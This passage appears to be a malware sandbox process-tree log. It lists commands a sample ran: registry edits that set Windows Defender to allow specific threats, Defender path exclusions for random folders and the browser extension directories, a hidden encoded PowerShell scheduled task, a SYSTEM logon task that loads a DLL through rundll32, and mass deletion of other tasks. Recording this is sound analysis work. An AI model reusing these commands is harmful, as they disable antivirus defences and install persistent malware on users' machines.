    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4124
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JJyFpTQoRlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JJyFpTQoRlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WJFamJaEBTfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WJFamJaEBTfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fnPDPsTirKjrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fnPDPsTirKjrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wLIvplUSU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wLIvplUSU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\AjAAYqfCeAnepTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\AjAAYqfCeAnepTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EiageFSkrUtPPHAL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EiageFSkrUtPPHAL\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4612
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JJyFpTQoRlUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcHRTMplLehSqKgCdGR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4224
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WJFamJaEBTfU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WJFamJaEBTfU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fnPDPsTirKjrC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fnPDPsTirKjrC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLIvplUSU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wLIvplUSU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\AjAAYqfCeAnepTVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\AjAAYqfCeAnepTVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EiageFSkrUtPPHAL /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EiageFSkrUtPPHAL /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1260
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gwjUEiOMY" /SC once /ST 05:43:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gwjUEiOMY"
  2⤵
  PID:4968
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gwjUEiOMY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wTCRKIeCvYDPezrzU"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wTCRKIeCvYDPezrzU"
  2⤵
  PID:2584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wTCRKIeCvYDPezrzU2"
  2⤵
  PID:2324
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wTCRKIeCvYDPezrzU2"
  2⤵
  PID:4568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bqQzvWgLjHyenYGOl"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1964
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqQzvWgLjHyenYGOl"
  2⤵
  PID:2168
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bqQzvWgLjHyenYGOl2"
  2⤵
  PID:4100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqQzvWgLjHyenYGOl2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1744
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gZZJWchISHXYAnojc"
  2⤵
  PID:4572
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gZZJWchISHXYAnojc"
  2⤵
  PID:4012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gZZJWchISHXYAnojc2"
  2⤵
  PID:3520
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gZZJWchISHXYAnojc2"
  2⤵
  PID:3120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "EeDMFmWmmWXZqwciB"
  2⤵
  PID:4600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "EeDMFmWmmWXZqwciB"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "EeDMFmWmmWXZqwciB2"
  2⤵
  PID:1372
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "EeDMFmWmmWXZqwciB2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ZICjdOfUYzVbRWNRj"
  2⤵
  PID:3848
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ZICjdOfUYzVbRWNRj"
  2⤵
  PID:3860
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ZICjdOfUYzVbRWNRj2"
  2⤵
  PID:3664
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ZICjdOfUYzVbRWNRj2"
  2⤵
  PID:4832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "dSmVwYYVQRDtSqHGh"
  2⤵
  PID:4308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "dSmVwYYVQRDtSqHGh"
  2⤵
  PID:832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "dSmVwYYVQRDtSqHGh2"
  2⤵
  PID:692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "dSmVwYYVQRDtSqHGh2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bMkGHBSdQRPgLspLe"
  2⤵
  PID:3516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bMkGHBSdQRPgLspLe"
  2⤵
  PID:4432
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bMkGHBSdQRPgLspLe2"
  2⤵
  PID:1524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bMkGHBSdQRPgLspLe2"
  2⤵
  PID:428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NIXzKJdQJQyXGLMVNbJ"
  2⤵
  PID:932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NIXzKJdQJQyXGLMVNbJ"
  2⤵
  PID:4404
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NIXzKJdQJQyXGLMVNbJ2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4408
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NIXzKJdQJQyXGLMVNbJ2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QlDjdRpryfXRXSZehkb"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5068
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QlDjdRpryfXRXSZehkb"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "QlDjdRpryfXRXSZehkb2"
  2⤵
  PID:4116
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "QlDjdRpryfXRXSZehkb2"
  2⤵
  PID:2808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RXJhSnxsnUZnjuomqQc"
  2⤵
  PID:2300
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RXJhSnxsnUZnjuomqQc"
  2⤵
  PID:2316
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RXJhSnxsnUZnjuomqQc2"
  2⤵
  PID:1916
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RXJhSnxsnUZnjuomqQc2"
  2⤵
  PID:1764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vHDQBHxeiMdAmBLbspa"
  2⤵
  PID:1228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vHDQBHxeiMdAmBLbspa"
  2⤵
  PID:4012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vHDQBHxeiMdAmBLbspa2"
  2⤵
  PID:4612
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vHDQBHxeiMdAmBLbspa2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3808
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "kgyACqSLXJcTDCSoDMk"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1656
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "kgyACqSLXJcTDCSoDMk"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4696
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "kgyACqSLXJcTDCSoDMk2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3248
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "kgyACqSLXJcTDCSoDMk2"
  2⤵
  PID:748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "YmMYimuQlaimPygSPxM"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4564
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YmMYimuQlaimPygSPxM"
  2⤵
  PID:1848
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "YmMYimuQlaimPygSPxM2"
  2⤵
  PID:4832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YmMYimuQlaimPygSPxM2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4724
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "MhGGIHasyeEkcmJHuff"
  2⤵
  PID:2052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MhGGIHasyeEkcmJHuff"
  2⤵
  PID:3676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "MhGGIHasyeEkcmJHuff2"
  2⤵
  PID:4592
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "MhGGIHasyeEkcmJHuff2"
  2⤵
  PID:4604
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wLIvplUSU\vWqHAt.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "thOwFuKJdpsLdjY" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2164
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JJVrgEBcjRPEVpY"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:400
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JJVrgEBcjRPEVpY"
  2⤵
  PID:3688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JJVrgEBcjRPEVpY2"
  2⤵
  PID:2648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JJVrgEBcjRPEVpY2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3864
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XFrDvdtkAaVZDJF"
  2⤵
  PID:1692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XFrDvdtkAaVZDJF"
  2⤵
  PID:3104
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XFrDvdtkAaVZDJF2"
  2⤵
  PID:3184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XFrDvdtkAaVZDJF2"
  2⤵
  PID:5112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XlKrxptmqxBhcCD"
  2⤵
  PID:1668
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XlKrxptmqxBhcCD"
  2⤵
  PID:4616
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "XlKrxptmqxBhcCD2"
  2⤵
  PID:3436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XlKrxptmqxBhcCD2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2132
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "AGZkPwgTgasPhpl"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "AGZkPwgTgasPhpl"
  2⤵
  PID:2460
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "AGZkPwgTgasPhpl2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5040
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "AGZkPwgTgasPhpl2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bgOsGbfEyEHheDd"
  2⤵
  PID:4892
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgOsGbfEyEHheDd"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:804
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "bgOsGbfEyEHheDd2"
  2⤵
  PID:4044
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgOsGbfEyEHheDd2"
  2⤵
  PID:2388
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwLiSZNHuiWjsss"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwLiSZNHuiWjsss"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1260
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "DwLiSZNHuiWjsss2"
  2⤵
  PID:3944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "DwLiSZNHuiWjsss2"
  2⤵
  PID:920
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "gMcvWNAhkgXJQi"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gMcvWNAhkgXJQi"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KKTimVQlXxsohw"
  2⤵
  PID:912
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KKTimVQlXxsohw"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "sahWUAUTMzxiyE"
  2⤵
  PID:4412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "sahWUAUTMzxiyE"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4604
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NZKqdOSzMceoOa"
  2⤵
  PID:2828
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NZKqdOSzMceoOa"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1004
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "pWuLYfsuBiVVwr"
  2⤵
  PID:932
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "pWuLYfsuBiVVwr"
  2⤵
  PID:4448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "SSYJcyrIEoxgkx"
  2⤵
  PID:4948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "SSYJcyrIEoxgkx"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vEdHEhowNEolP"
  2⤵
  PID:3820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vEdHEhowNEolP"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "vEdHEhowNEolP2"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "vEdHEhowNEolP2"
  2⤵
  PID:4688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KJfCOYjClKYNw"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KJfCOYjClKYNw"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "KJfCOYjClKYNw2"
  2⤵
  PID:3652
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "KJfCOYjClKYNw2"
  2⤵
  PID:1280
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "HfNDTBzsERyUD"
  2⤵
  PID:3816
